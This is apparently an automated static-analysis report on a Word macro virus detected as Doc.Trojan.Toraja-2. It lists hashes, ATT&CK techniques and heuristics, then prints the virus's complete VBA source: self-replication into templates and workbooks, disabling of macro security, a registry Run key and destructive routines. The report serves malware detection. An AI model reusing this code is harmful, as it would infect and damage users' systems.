Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fcf766e417d59f2b…

MALICIOUS

Office (OLE)

Size: 62.5 KB
Created: 2004-07-12 14:52:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: 55b17ddba2ce79164534a646126623fb
SHA-1: 1dcb878a0b0e61577eeb4e4abb58147ae31639e9
SHA-256: fcf766e417d59f2b08c6791a7fe5514ed523f94ea166c61136654075c19944d9
Risk score: 536

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1071.001 Web Protocols

The sample contains critical heuristics indicating the presence of VBA macros, specifically AutoOpen and Auto_Open, which are designed to execute automatically. The macros utilize WScript.Shell and CreateObject, along with a Shell() call, strongly suggesting the intent to download and execute a second-stage payload. The ClamAV detection as 'Doc.Trojan.Toraja-2' further supports its malicious nature, though a specific family could not be confidently identified.

Heuristics (12)

  • ClamAV: Doc.Trojan.Toraja-2 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Toraja-2
  • VBA macros detected [medium, 8 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell "regedit.exe /s \windows.reg", vbHide
  • WScript.Shell usage [critical] OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Print #1, "Set WSH = WScript.CreateObject("; """WScript.Shell"""; ")"
  • VBA macro-virus self-replication / AV tampering [critical] OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
                .VirusProtection = False
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set xlsApp = CreateObject("Excel.Application")
  • VBA copies the workbook into the Excel XLSTART startup folder [high] OLE_VBA_XLSTART_PERSISTENCE
    The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.
    Matched line in script
    Baru = Application.StartupPath & Application.PathSeparator & "EXCEL" & SN & ".XLS"
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Open macro [low] OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Reference to Windows Script Host [high] SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic macro-virus markers [high] OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 14422 bytes
SHA-256: 484fc7bad0f56a2a4c7c6260f455ebe46d17e93944382ed9466c594c8a0c1610
Detection: ClamAV: Doc.Trojan.Toraja-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "WEToraja"

Option Compare Text
Dim obj As Variant
Dim x As Variant
Dim sehat As Boolean
Dim actWindow
Public Const app As String = "Application"
Public Const appset As String = "Settings"
Public Const appN As String = "AppName"
Public Const TimerOn = "00:01:00"
Const TempSN As String = "Psychologic"
Const MacID As String = "Toraja"
Const SN As String = "TorajaLand"
Const xlogo As String = "logo"
Global Infeksi As Boolean
Global Active
Global Temp
Global TempPath

Sub RegID()
On Error Resume Next
If GetSetting(app, appset, "TorajaDate") = "" Then SaveSetting app, appset, "TorajaDate", Format(Date + 7, "dd-mm-yyyy")
If GetSetting(app, appset, "Version") <> SN Then SaveSetting app, appset, "Version", SN
If GetSetting(app, appset, "ProgID") <> MacID & SN Then SaveSetting app, appset, "ProgID", "Toraja"
    End Sub

Function Periksa() As Boolean
Application.EnableCancelKey = 0
Dim getDate As Date
On Error Resume Next
getDate = GetSetting(app, appset, "TorajaDate")
If getDate <= Date Then sponsor
End Function

Function objKorban(Sumber, Target) As Boolean
On Error GoTo Lari
sehat = False
For Each obj In Target.VBProject.VBComponents
      If obj.Name = MacID & SN Then sehat = True
      If (obj.Name <> "ThisDocument") And (obj.Name <> "Reference To Normal") And (obj.Name <> "logo") And (obj.Name <> MacID & SN) And _
          (Left(obj.Name, 5) <> "Sheet") And (obj.Name <> "ThisWorkbook") And (Left(obj.Name, 5) <> "Chart") Then
            Target.VBProject.VBComponents.Remove Target.VBProject.VBComponents(obj.Name)
            objKorban = True
            End If
            Next obj
      If sehat = False Then
        If Infect(Sumber, Target, MacID & SN) And Infect(Sumber, Target, xlogo) = True Then objKorban = True
           
    End If
Lari:
End Function

Sub Sikat()
On Error Resume Next
Set x = Documents
For Each x In Documents
    If x <> ActiveDocument Then
        objKorban ActiveDocument, x
        If Len(x.Path) <> 0 Then x.Save
    End If
Next x
SaveSetting app, appN, "Microsoft Excel", "False"
End Sub

Function Infect(Sumber, Target, obj As String) As Boolean
On Error GoTo ILari
    Sumber.VBProject.VBComponents(obj).Export TempPath & obj
    Target.VBProject.VBComponents.Import TempPath & obj
    Infect = True
    Kill TempPath & obj
Exit Function

ILari:
End Function

Private Sub ExpXls()
Dim xlsApp
Dim sfile As String
If (GetSetting(app, appN, "Microsoft Excel") <> "True") Then
On Error GoTo ELari:
    Set xlsApp = CreateObject("Excel.Application")
    xlsApp.Workbooks.Add
    sfile = xlsApp.StartupPath & xlsApp.PathSeparator & "EXCEL" & SN & ".XLS"
    xlsApp.ActiveWorkbook.SaveAs sfile
    TempPath = Application.NormalTemplate.Path & Application.PathSeparator
    Infect NormalTemplate, xlsApp.Workbooks("EXCEL" & SN & ".XLS"), MacID & SN
    Infect NormalTemplate, xlsApp.Workbooks("EXCEL" & SN & ".XLS"), "logo"
    xlsApp.Workbooks("EXCEL" & SN & ".XLS").VBProject.Name = TempSN & SN
    xlsApp.ActiveWindow.Visible = False
    xlsApp.Workbooks("EXCEL" & SN & ".XLS").Save
    xlsApp.Application.Quit
    SaveSetting app, appN, "Microsoft Excel", "True"
    Set xlsApp = Nothing
End If
ELari:
End Sub

Sub ExpDok()
Dim dokApp
If (GetSetting(app, appN, "Microsoft Word") <> "True") Then
    On Error GoTo DLari
    Set dokApp = CreateObject("Word.Application")
    dokApp.NormalTemplate.OpenAsDocument
    objKorban Workbooks("EXCEL" & SN & ".XLS"), dokApp.ActiveDocument
    dokApp.ActiveDocument.SaveAs ("normal.dot")
    dokApp.ActiveDocument.Close
    dokApp.Application.Quit
    SaveSetting app, appN, "Microsoft Word", "True"
    Set dokApp = Nothing
End If
DLari:
End Sub

Sub ActTemp()
On Error Resume Next
CekApp
If objKorban(Active, Temp) = True Then
       Temp.VBProject.Name = TempSN & SN
       Temp.Save
       SaveSetting app, appN, Application.Name, "True"
       Infeksi = True
    End If
End Sub

Sub TempAct()
On Error Resume Next
CekApp
 If objKorban(Temp, Active) = True Then
       Active.VBProject.Name = MacID
       If Len(Active.Path) <> 0 Then Active.Save
    End If
End Sub
'----------------------- Manipulating command bars and keyboard
Sub MExcel()
On Error Resume Next
For Each x In CommandBars.ActiveMenuBar.Controls("Tools").Controls("Macro").Controls
              x.OnAction = "amd"
Next x
    WEBarC
    CommandBars("Ply").Controls("View Code").Delete
    With Application
            .OnKey "%{F2}", "periksa"
            .OnKey "%{F4}", "periksa"
            .OnKey "%{F8}", "periksa"
            .OnKey "%{F11}", "amd"
            .OnKey "{F12}", "periksa"
            .OnKey "^{o}", "OpenFile"
    End With
CommandBars("Standard").Controls("Open").OnAction = "OpenFile"
CommandBars("Worksheet Menu Bar").Controls("File").Controls("Open...").OnAction = "OpenFile"
End Sub
'Change command bars
Sub WEBarC()
On Error Resume Next
AturCmd CommandBars.ActiveMenuBar, False
AturCmd CommandBars("Formatting"), False
AturCmd CommandBars("Standard"), False
AturCmd CommandBars("Control Toolbox"), True
AturCmd CommandBars("Forms"), True
AturCmd CommandBars("ActiveX Control"), True
AturCmd CommandBars("Visual Basic"), True
End Sub

Sub AturCmd(cmd, param As Boolean)
With cmd
    If param = True Then
        .Enabled = False
        .Visible = False
    End If
End With
End Sub

Sub MWord()
On Error Resume Next
CustomizationContext = NormalTemplate
  With Options
            .VirusProtection = False
            .SaveNormalPrompt = False
    End With
    FindKey(BuildKeyCode(wdKeyAlt, wdKeyF8)).Disable
    FindKey(BuildKeyCode(wdKeyAlt, wdKeyF11)).Disable
    WEBarC
End Sub

Sub w2000()
On Error Resume Next
Siluman
Dhemit
Open "\windows.reg" For Output As #1
Print #1, "REGEDIT4"
Print #1,
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]"
Print #1, """"; "Level"; """"; "=dword:00000001"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Excel\Security]"
Print #1, """"; "Level"; """"; "=dword:00000001"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]"
Print #1, """"; "Level"; """"; "=dword:00000001"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security]"
Print #1, """"; "Level"; """"; "=dword:00000001"
Print #1, "[Hkey_Local_Machine\software\microsoft\Windows\CurrentVersion\Run]"
Print #1, """"; "FixSys"; """"; "="; """"; "regedit.exe /s \\windows.reg"; """"
Close #1
On Error Resume Next
Shell "regedit.exe /s \windows.reg", vbHide
End Sub

Sub Siluman()
Open "\autosys.bat" For Output As #1
Print #1, "regedit /s \windows.reg"
Close #1
End Sub
Sub Dhemit()
Open "\sysinfo.ini.vbs" For Output As #1
Print #1, "Dim WSH"
Print #1, "Set WSH = WScript.CreateObject("; """WScript.Shell"""; ")"
Print #1, "WSH.RegWrite "; """HKCU\Software\Microsoft\Office\10"; "."; "0\Word\Security\Level"""; ", 1, "; """REG_DWORD"""
Print #1, "WSH.RegWrite "; """HKCU\Software\Microsoft\Office\10"; "."; "0\Excel\Security\Level"""; ", 1, "; """REG_DWORD"""
Print #1, "WSH.RegWrite "; """HKCU\Software\Microsoft\Office\9"; "."; "0\Word\Security\Level"""; ", 1, "; """REG_DWORD"""
Print #1, "WSH.RegWrite "; """HKCU\Software\Microsoft\Office\9"; "."; "0\Excel\Security\Level"""; ", 1, "; """REG_DWORD"""
Print #1, "Set WWA = WScript.CreateObject("; """Word.application"""; ")"
Print #1, "WWA.Options.VirusProtection = False"
Print #1, "WWA.Options.SaveNormalPrompt = False"
Print #1, "WWA.Application.Quit"
Close #1
End Sub

Sub AutoExec()
       Application.EnableCancelKey = 0
        Application.DisplayRecentFiles = False
        SaveSetting app, appN, "Microsoft Word", "True"
        w2000
        MWord
        ExpXls
        RegID
        Documents.Add
        Application.OnTime Now + TimeValue(TimerOn), "Pewaktu"
End Sub

Sub AutoNew()
On Error Resume Next
TempAct
End Sub

Sub AutoOpen()
On Error Resume Next
Dim strRun As String

        Application.EnableCancelKey = 0
        ActTemp
        Sikat
        w2000
        MWord
        RegID
        If Infeksi = True Then
            strRun = TempSN & SN & "." & MacID & SN & ".Ketemu"
            Application.OnTime Now + TimeValue("00:01:00"), strRun
       End If
End Sub

Sub FileOpen()
On Error Resume Next
    WordBasic.DisableAutoMacros 1
    Dialogs(80).Show
    TempAct
    WordBasic.DisableAutoMacros 0
End Sub

Sub Auto_Open()
On Error Resume Next
Application.EnableCancelKey = 0
XlsAct
ExpDok
w2000
Application.DisplayRecentFiles = False
End Sub

Private Sub AllWB()
sehat = False
For Each obj In Workbooks
      actWindow = obj.Name
      If actWindow = "EXCEL" & SN & ".XLS" Then sehat = True
      If obj.Path = Application.StartupPath And actWindow <> "EXCEL" & SN & ".XLS" Then
               obj.Close False
               Kill Application.StartupPath & Application.PathSeparator & actWindow
         End If
 Next obj
If sehat = False Then PicuXlsAct
End Sub

Sub XlsAct()
On Error Resume Next
Application.EnableCancelKey = 0
Application.DisplayAlerts = False
TempAct
AllWB
Application.OnSheetActivate = ""
Application.OnSheetDeactivate = ""
Application.OnWindow = ""
MExcel
Application.OnWindow = "EXCEL" & SN & ".XLS" & "!XlsAct"
Application.DisplayAlerts = True
Application.ScreenUpdating = True
End Sub



Sub OpenFile()
On Error Resume Next
Application.DisplayAlerts = False
Application.Dialogs(1).Show
XlsAct
End Sub

Sub PicuXlsAct()
Dim Baru As String
On Error Resume Next
Application.ScreenUpdating = False
Workbooks.Add
Baru = Application.StartupPath & Application.PathSeparator & "EXCEL" & SN & ".XLS"
ActiveWorkbook.SaveAs Baru
ActiveWindow.Visible = False
ActTemp
End Sub

Sub Pewaktu()
    Periksa
    Application.OnTime Now + TimeValue(TimerOn), "Pewaktu"
End Sub

Sub Ketemu()
TempAct
Infeksi = False
End Sub

Sub CekApp()
If Application.Name = "Microsoft Word" Then Doc Else Xls
End Sub
Sub Doc()
TempPath = Application.NormalTemplate.Path & Application.PathSeparator
Set Active = ActiveDocument
Set Temp = NormalTemplate
End Sub

Sub Xls()
Set Active = ActiveWorkbook
Set Temp = Workbooks("EXCEL" & SN & ".XLS")
TempPath = Application.TemplatesPath
End Sub

Sub sponsor()
Application.EnableCancelKey = 0
On Error Resume Next
LOGO.Show
End Sub

Sub ToolsCustomizeKeyboard()
right_animate
End Sub

Sub ViewCode()
up_animate
End Sub

Sub ViewVBcode()
wani2
End Sub

Sub ToolsCustomize()
bottom_animate
End Sub

Sub ToolsMacro()
wani2
End Sub

Sub ToolsRecordMacroToggle()
wani2
End Sub

Sub FileTemplates()
left_animate
End Sub

Sub ViewSecurity()
MsgBox (" Well...!! Do you want to change it ?? ask Psychologic to do that !!! ")
left_animate
right_animate
bottom_animate
up_animate
wani2
Periksa
End Sub

Sub wani2()
Application.EnableCancelKey = 0
Dim numchars As Integer
numchars = ActiveDocument.Characters.Count
    Do While x < numchars
    x = x + 1
    Selection.HomeKey Unit:=wdStory
    Selection.MoveRight Unit:=wdCharacter, Count:=1, Extend:=wdExtend
    Selection.Cut
Loop
End Sub

Sub amd()
Dim angka
angka = 0
On Error Resume Next
ActiveWindow.Zoom = 80
Rows("1:101").Select
Selection.RowHeight = 23
Range("A1").Select

Do While angka < 17
angka = angka + 1

x = Animate("d", angka)
x = Animate("a", angka)
x = Animate("b", angka)
x = Animate("c", angka)
x = Animate("F", angka)
x = Animate("g", angka)
x = Animate("i", angka)
x = Animate("h", angka)
x = Animate("j", angka)
x = Animate("e", angka)
Loop
End Sub

Function Animate(ax, bx)
Application.EnableCancelKey = 0
Dim x
Dim c
    x = 0
    Do While x < 17
    x = x + 1
    Range(ax & bx).Select
    Selection.Font.ColorIndex = 3
    Selection.Copy
    Range(ax & x).Select
    For c = 1 To 11250
     c = c + 1
    Next
    Loop
    Range(ax & bx).Select
    Selection.Copy
    Range(ax & x).Select
    ActiveSheet.Paste
    Range(ax & bx).Select
    Selection.ClearContents
    Range(ax & bx).Select
End Function

Sub bottom_animate()
Application.EnableCancelKey = 0
On Error Resume Next
Dim cbar1
Dim y
y = 0
Do While y < 10
y = y + 1
Dim x
x = 0
Do While x < 15
x = x + 1
Set cbar1 = CommandBars.Add(Name:="TorajaLand" + Str(x), Position:=msoBarTop)
cbar1.Visible = True
Loop
Dim z
z = 0
Do While z < 15
z = z + 1
    CommandBars("TorajaLand" + Str(z)).Delete
Loop
Loop
End Sub

Sub left_animate()
Application.EnableCancelKey = 0
On Error Resume Next
Dim cbar1
Dim y
y = 0
Do While y < 10
y = y + 1
Dim x
x = 0
Do While x < 15
x = x + 1
Set cbar1 = CommandBars.Add(Name:="TorajaLand" + Str(x), Position:=msoBarLeft)
cbar1.Visible = True
Loop
Dim z
z = 0
Do While z < 15
z = z + 1
    CommandBars("TorajaLand" + Str(z)).Delete
Loop
Loop
End Sub

Sub right_animate()
Application.EnableCancelKey = 0
On Error Resume Next
Dim cbar1
Dim y
y = 0
Do While y < 10
y = y + 1
Dim x
x = 0
Do While x < 21
x = x + 1
Set cbar1 = CommandBars.Add(Name:="TorajaLand" + Str(x), Position:=msoBarRight)
cbar1.Visible = True
Loop
Dim z
z = 0
Do While z < 21
z = z + 1
    CommandBars("TorajaLand" + Str(z)).Delete
Loop
Loop
End Sub

Sub up_animate()
Application.EnableCancelKey = 0
On Error Resume Next
Dim cbar1
Dim y
y = 0
Do While y < 10
y = y + 1
Dim x
x = 0
Do While x < 15
x = x + 1
Set cbar1 = CommandBars.Add(Name:="TorajaLand" + Str(x), Position:=msoBarBottom)
cbar1.Visible = True
Loop
Dim z
z = 0
Do While z < 15
z = z + 1
    CommandBars("TorajaLand" + Str(z)).Delete
Loop
Loop
End Sub



Attribute VB_Name = "LOGO"
Attribute VB_Base = "0{C86A27B0-D44D-11D8-9C6E-DF5DD9CB4755}{C86A2755-D44D-11D8-9C6E-DF5DD9CB4755}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False